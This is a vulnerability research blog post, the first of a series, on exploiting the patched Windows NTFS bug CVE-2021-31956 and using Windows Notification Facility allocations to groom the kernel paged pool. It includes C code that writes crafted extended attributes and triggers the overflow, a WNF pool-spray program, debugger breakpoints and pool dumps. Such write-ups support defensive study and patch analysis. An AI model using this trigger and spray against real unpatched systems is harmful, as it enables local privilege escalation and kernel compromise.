
CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1

15 July 2021 at 12:07

Introduction

Recently I decided to take a look at CVE-2021-31956, a local privilege escalation within Windows due to a kernel memory corruption bug which was patched within the June 2021 Patch Tuesday.

Microsoft describe the vulnerability within their advisory document, which notes many versions of Windows being affected and in-the-wild exploitation of the issue being used in targeted attacks. The exploit was found in the wild by https://twitter.com/oct0xor of Kaspersky.

Kaspersky produced a nice summary of the vulnerability and describe briefly how the bug was exploited in the wild.

As I did not have access to the exploit (unlike Kaspersky?), I attempted to exploit this vulnerability on Windows 10 20H2 to determine the ease of exploitation and to understand the challenges attackers face when writing modern kernel pool exploits for Windows 10 20H2 and onwards.

One thing that stood out to me was the mention of the Windows Notification Facility (WNF) being used by the in-the-wild attackers to enable novel exploit primitives. This led to further investigation into how this could be used to aid exploitation in general. The findings I present below are obviously speculation based on likely uses of WNF by an attacker. I look forward to seeing the Kaspersky write-up to determine if my assumptions on how this feature could be leveraged are correct!

This blog post is the first in the series and will describe the vulnerability, the initial constraints from an exploit development perspective and finally how WNF can be abused to obtain a number of exploit primitives. The blogs will also cover exploit mitigation challenges encountered along the way, which make writing modern pool exploits more difficult on the most recent versions of Windows.

Future blog posts will describe improvements which can be made to an exploit to enhance reliability, stability and clean-up afterwards.

Vulnerability Summary

As there was already a nice summary produced by Kaspersky it was trivial to locate the vulnerable code inside the ntfs.sys driver’s NtfsQueryEaUserEaList function:

The backing structure in this case is _FILE_FULL_EA_INFORMATION.

Basically the code above loops through each NTFS extended attribute (Ea) for a file and copies from the Ea Block into the output buffer based on the size of ea_block->EaValueLength + ea_block->EaNameLength + 9.

There is a check to ensure that the ea_block_size is less than or equal to out_buf_length - padding.

The out_buf_length is then decremented by the size of the ea_block_size and its padding.

The padding is calculated by ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;

This is because each Ea Block should be padded to be 32-bit aligned.

Putting some example numbers into this, let's assume there are two extended attributes set on the file.

At the first iteration of the loop we could have the following values:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18
padding = 0

So assuming that 18 <= out_buf_length - 0, data would be copied into the buffer. We will use an out_buf_length of 30 for this example.

out_buf_length = 30 - 18 + 0
out_buf_length = 12 // we would have 12 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

We could then have a second extended attribute in the file with the same values :

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18

At this point padding is 2, so the calculation is:

18 <= 12 - 2 // is False.

Therefore, the second memory copy would correctly not occur due to the buffer being too small.

However, consider the scenario where the out_buf_length is 18 and we have the following setup.

First extended attribute:

EaNameLength = 5
EaValueLength = 4

Second extended attribute:

EaNameLength = 5
EaValueLength = 47

On the first iteration of the loop:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 // 18
padding = 0

The resulting check is:

18 <= 18 - 0 // is True and a copy of 18 occurs.
out_buf_length = 18 - 18 + 0 
out_buf_length = 0 // We would have 0 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

Our second extended attribute with the following values:

EaNameLength = 5
EaValueLength = 47

ea_block_size = 9 + 5 + 47
ea_block_size = 61

The resulting check will be:

ea_block_size <= out_buf_length - padding

61 <= 0 - 2

At this point the unsigned subtraction 0 - 2 underflows, the check passes, and 61 bytes will be copied off the end of the buffer, corrupting the adjacent memory.
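
To make the arithmetic concrete, the following is a minimal standalone simulation (not the ntfs.sys code itself; the variable names simply mirror those used above) of the loop with an 18-byte output buffer and Ea blocks of sizes 18 and 61, showing the unsigned subtraction 0 - 2 wrapping around so that the second check passes:

#include <stdio.h>

int main(void)
{
    unsigned int out_buf_length = 18;                      /* Length passed to NtQueryEaFile */
    unsigned int padding = 0;                              /* padding carried from the previous block */
    unsigned int blocks[2][2] = { { 5, 4 }, { 5, 47 } };   /* { EaNameLength, EaValueLength } */

    for (int i = 0; i < 2; i++) {
        unsigned int ea_block_size = 9 + blocks[i][0] + blocks[i][1];

        /* The vulnerable check: on the second iteration 0 - 2 wraps to 0xFFFFFFFE. */
        if (ea_block_size <= out_buf_length - padding) {
            printf("block %d: copying %u bytes (out_buf_length=%u, padding=%u)\n",
                   i, ea_block_size, out_buf_length, padding);
            out_buf_length -= ea_block_size + padding;
            padding = ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;
        } else {
            printf("block %d: check failed, no copy\n", i);
        }
    }
    return 0;
}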

Looking at the caller of this function NtfsCommonQueryEa, we can see the output buffer is allocated on the paged pool based on the size requested:

By looking at the callers of NtfsCommonQueryEa, we can see that the NtQueryEaFile system call triggers this code path to reach the vulnerable code.

The documentation for the Zw version of this syscall function is here.

We can see that the output buffer Buffer is passed in from userspace, together with the Length of this buffer. This means we end up with a controlled-size allocation in kernel space based on the size of the buffer. However, to trigger this vulnerability, we need to trigger an underflow as described above.

In order to trigger the underflow, we need to set our output buffer size to be the length of the first Ea Block.

Provided padding is required after the first Ea Block, the second Ea Block will then be written out of bounds of the buffer when it is queried.

The interesting aspects of this vulnerability from an attacker's perspective are:

1) The attacker can control the data which is used within the overflow and the size of the overflow. Extended attribute values do not constrain the byte values which they can contain.
2) The overflow is linear and will corrupt any adjacent pool chunks.
3) The attacker has control over the size of the pool chunk allocated.

However, the question is whether this can be exploited reliably in the presence of modern kernel pool mitigations, and whether this is a “good” memory corruption:

What makes a good memory corruption.

Triggering the corruption

So how do we construct a file containing NTFS extended attributes which will lead to the vulnerability being triggered when NtQueryEaFile is called?

The function NtSetEaFile has the Zw version documented here.

The Buffer parameter here is “a pointer to a caller-supplied, FILE_FULL_EA_INFORMATION-structured input buffer that contains the extended attribute values to be set”.

Therefore, using the values above, the first extended attribute occupies the space within the buffer between offsets 0 and 18.

There is then the padding length of 2, with the second extended attribute starting at offset 20.

typedef struct _FILE_FULL_EA_INFORMATION {
  ULONG  NextEntryOffset;
  UCHAR  Flags;
  UCHAR  EaNameLength;
  USHORT EaValueLength;
  CHAR   EaName[1];
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;

The key thing here is that NextEntryOffset of the first EA block is set to the offset of the overflowing EA including the padding position (20). Then for the overflowing EA block the NextEntryOffset is set to 0 to end the chain of extended attributes being set.

This means constructing two extended attributes, where the first extended attribute block has the size in which we want our vulnerable buffer to be allocated (minus the pool header). The second extended attribute block is set to the overflow data.

If we set our first extended attribute block to be exactly the size of the Length parameter passed in NtQueryEaFile then, provided there is padding, the check will be underflowed and the second extended attribute block will allow a copy of an attacker-controlled size.

So in summary, once the extended attributes have been written to the file using NtSetEaFile, it is then necessary to trigger the vulnerable code path to act on them by setting the output buffer size to be exactly the same size as our first extended attribute using NtQueryEaFile.
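
As a rough sketch of the above (this is not the author's PoC: the Nt* prototypes are assumed from the documented Zw* versions, the file path and attribute names are placeholders, the file must live on an NTFS volume, and error handling is omitted), the extended attributes can be written and the vulnerable path triggered as follows:

#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#include <string.h>

typedef struct _FULL_EA {                 /* mirrors FILE_FULL_EA_INFORMATION above */
    ULONG  NextEntryOffset;
    UCHAR  Flags;
    UCHAR  EaNameLength;
    USHORT EaValueLength;
    CHAR   EaName[1];
} FULL_EA;

typedef struct _GET_EA {                  /* mirrors FILE_GET_EA_INFORMATION */
    ULONG NextEntryOffset;
    UCHAR EaNameLength;
    CHAR  EaName[1];
} GET_EA;

typedef NTSTATUS (NTAPI *NtSetEaFile_t)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG);
typedef NTSTATUS (NTAPI *NtQueryEaFile_t)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG,
                                          BOOLEAN, PVOID, ULONG, PULONG, BOOLEAN);

int main(void)
{
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    NtSetEaFile_t   pNtSetEaFile   = (NtSetEaFile_t)GetProcAddress(ntdll, "NtSetEaFile");
    NtQueryEaFile_t pNtQueryEaFile = (NtQueryEaFile_t)GetProcAddress(ntdll, "NtQueryEaFile");

    HANDLE file = CreateFileA("C:\\temp\\ea_overflow.bin", GENERIC_READ | GENERIC_WRITE, 0,
                              NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

    UCHAR set_buf[0x200] = { 0 };

    /* First Ea block: 9 + 5 + 4 = 18 bytes, padded to the next 4-byte boundary (20). */
    FULL_EA *ea1 = (FULL_EA *)set_buf;
    ea1->NextEntryOffset = 20;            /* offset of the second block, including padding */
    ea1->EaNameLength = 5;
    ea1->EaValueLength = 4;
    memcpy(ea1->EaName, "AAAAA", 6);      /* name plus NUL terminator */
    memset(ea1->EaName + 6, 'B', 4);      /* 4-byte value */

    /* Second Ea block: 9 + 5 + 47 = 61 bytes of attacker-controlled overflow data. */
    FULL_EA *ea2 = (FULL_EA *)(set_buf + 20);
    ea2->NextEntryOffset = 0;             /* terminates the chain */
    ea2->EaNameLength = 5;
    ea2->EaValueLength = 47;
    memcpy(ea2->EaName, "CCCCC", 6);
    memset(ea2->EaName + 6, 'D', 47);     /* bytes copied past the end of the pool chunk */

    IO_STATUS_BLOCK iosb;
    pNtSetEaFile(file, &iosb, set_buf, 20 + 61);

    /* User-supplied Ea list naming both attributes so the NtfsQueryEaUserEaList
       path walks them in order. */
    UCHAR list_buf[0x40] = { 0 };
    GET_EA *g1 = (GET_EA *)list_buf;
    g1->NextEntryOffset = 12;             /* 5 + 5 + 1 = 11, aligned up to 12 */
    g1->EaNameLength = 5;
    memcpy(g1->EaName, "AAAAA", 6);
    GET_EA *g2 = (GET_EA *)(list_buf + 12);
    g2->NextEntryOffset = 0;
    g2->EaNameLength = 5;
    memcpy(g2->EaName, "CCCCC", 6);

    /* Output buffer Length equal to the first Ea block's size (18) drives the underflow. */
    UCHAR out_buf[18] = { 0 };
    NTSTATUS status = pNtQueryEaFile(file, &iosb, out_buf, sizeof(out_buf), FALSE,
                                     list_buf, 12 + 11, NULL, TRUE);
    printf("NtQueryEaFile returned 0x%08lx\n", (unsigned long)status);

    CloseHandle(file);
    return 0;
}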

Understanding the kernel pool layout on Windows 10

The next thing we need to understand is how kernel pool memory works. There is plenty of older material on kernel pool exploitation on older versions of Windows, however, not very much on recent versions of Windows 10 (19H1 and up). There have been significant changes, bringing userland Segment Heap concepts to the Windows kernel pool. I highly recommend reading Scoop the Windows 10 Pool! by Corentin Bayet and Paul Fariello from Synacktiv for a brilliant paper on this and for proposing some initial techniques. Without this paper having been published already, exploitation of this issue would have been significantly harder.

Firstly, the important thing is to determine where in memory the vulnerable pool chunk is allocated and what the surrounding memory looks like. We determine which of the four heap “backends” the chunk lives on:

  • Low Fragmentation Heap (LFH)
  • Variable Size Heap (VS)
  • Segment Allocation
  • Large Alloc

I started off using the NtQueryEaFile parameter Length value above of 0x12 to end up with a vulnerable chunk of size 0x30 allocated on the LFH as follows:

Pool page ffff9a069986f3b0 region is Paged pool
 ffff9a069986f010 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f040 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f070 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f0a0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f0d0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f100 size:   30 previous size:    0  (Allocated)  Luaf
 ffff9a069986f130 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f160 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f190 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f1c0 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f1f0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f220 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f250 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f280 size:   30 previous size:    0  (Free)       SeGa
 ffff9a069986f2b0 size:   30 previous size:    0  (Free)       Ntf0
 ffff9a069986f2e0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f310 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f340 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f370 size:   30 previous size:    0  (Free)       APpt
*ffff9a069986f3a0 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff9a069986f3d0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f400 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f430 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f460 size:   30 previous size:    0  (Free)       SeUs
 ffff9a069986f490 size:   30 previous size:    0  (Free)       SeGa

This is due to the size of the allocation being below 0x200.

We can step through the corruption of the adjacent chunk occurring by setting a conditional breakpoint on the following location:

bp Ntfs!NtfsQueryEaUserEaList "j @r12 != 0x180 & @r12 != 0x10c & @r12 != 0x40 '';'gc'" then breakpointing on the memcpy location.

This example ignores some common sizes which are often hit on 20H2, as this code path is used by the system often under normal operation.

It should be mentioned that I initially missed the fact that the attacker has good control over the size of the pool chunk, and therefore went down the path of constraining myself to an expected chunk size of 0x30. This constraint was not actually true; however, it demonstrates that even with more restrictive attacker constraints these can often be worked around, and that you should always try to fully understand the constraints of your bug before jumping into exploitation 🙂

By analyzing the vulnerable NtFE allocation, we can see we have the following memory layout:

!pool @r9
*ffff8001668c4d80 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff8001668c4db0 size:   30 previous size:    0  (Free)       C...

1: kd> dt !_POOL_HEADER ffff8001668c4d80
nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

Followed by 0x12 bytes of the data itself.

This means that the chunk size calculation will be 0x12 + 0x10 = 0x22, which is then rounded up to the 0x30 segment chunk size.

We can however also adjust both the size of the allocation and the amount of data we will overflow.

As an alternative example, using the following values overflows from a chunk of 0x70 into the adjacent pool chunk (debug output is taken from testing code):

NtCreateFile is located at 0x773c2f20 in ntdll.dll
RtlDosPathNameToNtPathNameN is located at 0x773a1bc0 in ntdll.dll
NtSetEaFile is located at 0x773c42e0 in ntdll.dll
NtQueryEaFile is located at 0x773c3e20 in ntdll.dll
WriteEaOverflow EaBuffer1->NextEntryOffset is 96
WriteEaOverflow EaLength1 is 94
WriteEaOverflow EaLength2 is 59
WriteEaOverflow Padding is 2
WriteEaOverflow ea_total is 155
NtSetEaFileN sucess
output_buf_size is 94
GetEa2 pad is 1
GetEa2 Ea1->NextEntryOffset is 12
GetEa2 EaListLength is 31
GetEa2 out_buf_length is 94

This ends up being allocated within a 0x70 byte chunk:

ffffa48bc76c2600 size:   70 previous size:    0  (Allocated)  NtFE

As you can see it is therefore possible to influence the size of the vulnerable chunk.
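
As a rough rule of thumb (assuming a 0x10-byte _POOL_HEADER and 16-byte LFH granularity, as described above), the mapping from the Length parameter to the resulting chunk size can be sketched as follows:

#include <stdio.h>

/* Assumed model: allocation = Length + 0x10-byte _POOL_HEADER, rounded up to 16 bytes. */
static unsigned int chunk_size(unsigned int length)
{
    return (length + 0x10 + 0xf) & ~0xfu;
}

int main(void)
{
    printf("Length 0x12 -> chunk 0x%x\n", chunk_size(0x12)); /* 0x30, first example above */
    printf("Length 94   -> chunk 0x%x\n", chunk_size(94));   /* 0x70, second example above */
    return 0;
}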

At this point, we need to determine if it is possible to allocate adjacent chunks of a useful size class which can be overflowed into, to gain exploit primitives, as well as how to manipulate the paged pool to control the layout of these allocations (feng shui).

Much less has been written on Windows Paged Pool manipulation than Non-Paged pool and to our knowledge nothing at all has been publicly written about using WNF structures for exploitation primitives so far.

WNF Introduction

The Windows Notification Facility is a notification system within Windows which implements a publisher/subscriber model for delivering notifications.

Great previous research has been performed by Alex Ionescu and Gabrielle Viala documenting how this feature works and is designed.

I don’t want to duplicate the background here, so I recommend reading the following documents first to get up to speed:

Having a good grounding in the above research will allow a better understanding of how WNF-related structures are used by Windows.

Controlled Paged Pool Allocation

One of the first important things for kernel pool exploitation is being able to control the state of the kernel pool to be able to obtain a memory layout desired by the attacker.

There has been plenty of previous research into the non-paged pool and the session pool, however, less from a paged pool perspective. As this overflow is occurring within the paged pool, we need to find exploit primitives allocated within this pool.

After some reversing of WNF, it was determined that the majority of allocations used within this feature come from the paged pool.

I started off by looking through the primary structures associated with this feature and what could be controlled from userland.

One of the first things which stood out to me was that the actual data used for notifications is stored after the following structure:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

Which is pointed at by the WNF_NAME_INSTANCE structure’s StateData pointer:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Looking at the function NtUpdateWnfStateData we can see that this can be used for controlled size allocations within the paged pool, and can be used to store arbitrary data.

The following allocation occurs within ExpWnfWriteStateData, which is called from NtUpdateWnfStateData:

v19 = ExAllocatePoolWithQuotaTag((POOL_TYPE)9, (unsigned int)(v6 + 16), 0x20666E57u);

Looking at the prototype of the function:

We can see that the argument Length is our v6 value, with 0x10 added to it for the _WNF_STATE_DATA header which is prepended to the data.

Therefore, within the resulting chunk we have the 0x10-byte _POOL_HEADER as follows:

1: kd> dt _POOL_HEADER
nt!_POOL_HEADER
   +0x000 PreviousSize     : Pos 0, 8 Bits
   +0x000 PoolIndex        : Pos 8, 8 Bits
   +0x002 BlockSize        : Pos 0, 8 Bits
   +0x002 PoolType         : Pos 8, 8 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 PoolTag          : Uint4B
   +0x008 ProcessBilled    : Ptr64 _EPROCESS
   +0x008 AllocatorBackTraceIndex : Uint2B
   +0x00a PoolTagHash      : Uint2B

followed by the _WNF_STATE_DATA of size 0x10:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

With the arbitrary-sized data following the structure.

To track the allocations we make using this function we can use:

bp nt!ExpWnfWriteStateData "j @r8 = 0x100 '';'gc'"

We can then construct an allocation method which creates a new state name and performs our allocation:

NtCreateWnfStateName(&state, WnfTemporaryStateName, WnfDataScopeMachine, FALSE, 0, 0x1000, psd);
NtUpdateWnfStateData(&state, buf, alloc_size, 0, 0, 0, 0);
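
A rough sketch of a spray built from these two calls is shown below. The NtCreateWnfStateName / NtUpdateWnfStateData prototypes, and the WnfTemporaryStateName / WnfDataScopeMachine values, are assumptions taken from public WNF research rather than official headers, and the spray count and data size are arbitrary placeholders.

#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#include <string.h>

#define WnfTemporaryStateName 3     /* WNF_STATE_NAME_LIFETIME value, per public research */
#define WnfDataScopeMachine   4     /* WNF_DATA_SCOPE value, per public research */

typedef NTSTATUS (NTAPI *NtCreateWnfStateName_t)(ULONG64 *StateName, ULONG NameLifetime,
    ULONG DataScope, BOOLEAN PersistData, PVOID TypeId, ULONG MaximumStateSize,
    PSECURITY_DESCRIPTOR SecurityDescriptor);
typedef NTSTATUS (NTAPI *NtUpdateWnfStateData_t)(ULONG64 *StateName, const VOID *Buffer,
    ULONG Length, PVOID TypeId, const VOID *ExplicitScope, ULONG MatchingChangeStamp,
    ULONG CheckStamp);

#define SPRAY_COUNT 2000
#define DATA_SIZE   0x10            /* 0x10 data + 0x10 _WNF_STATE_DATA + 0x10 _POOL_HEADER = 0x30 chunk */

ULONG64 g_state_names[SPRAY_COUNT];

int main(void)
{
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    NtCreateWnfStateName_t pNtCreateWnfStateName =
        (NtCreateWnfStateName_t)GetProcAddress(ntdll, "NtCreateWnfStateName");
    NtUpdateWnfStateData_t pNtUpdateWnfStateData =
        (NtUpdateWnfStateData_t)GetProcAddress(ntdll, "NtUpdateWnfStateData");

    /* Security descriptor with a NULL DACL so the state names remain accessible. */
    SECURITY_DESCRIPTOR sd;
    InitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION);
    SetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE);

    UCHAR buf[DATA_SIZE];
    memset(buf, 'A', sizeof(buf));

    for (int i = 0; i < SPRAY_COUNT; i++) {
        pNtCreateWnfStateName(&g_state_names[i], WnfTemporaryStateName, WnfDataScopeMachine,
                              FALSE, NULL, 0x1000, &sd);
        pNtUpdateWnfStateData(&g_state_names[i], buf, DATA_SIZE, NULL, NULL, 0, 0);
    }
    printf("sprayed %d Wnf state data allocations\n", SPRAY_COUNT);
    return 0;
}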

Using this we can spray controlled sizes within the paged pool and fill it with controlled objects:

1: kd> !pool ffffbe0f623d7190
Pool page ffffbe0f623d7190 region is Paged pool
 ffffbe0f623d7020 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7050 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7080 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7110 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7140 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
*ffffbe0f623d7170 size:   30 previous size:    0  (Allocated) *Wnf  Process: ffff87056ccc0080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffffbe0f623d71a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d71d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7200 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7230 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7260 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7290 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7320 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7350 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7380 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7410 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7440 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7470 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7500 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7530 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7560 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7590 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7620 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7650 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7680 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7710 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7740 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7770 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7800 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7830 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7860 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7890 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7920 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7950 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7980 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7aa0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ad0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7cb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ce0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7da0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffffbe0f623d7dd0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
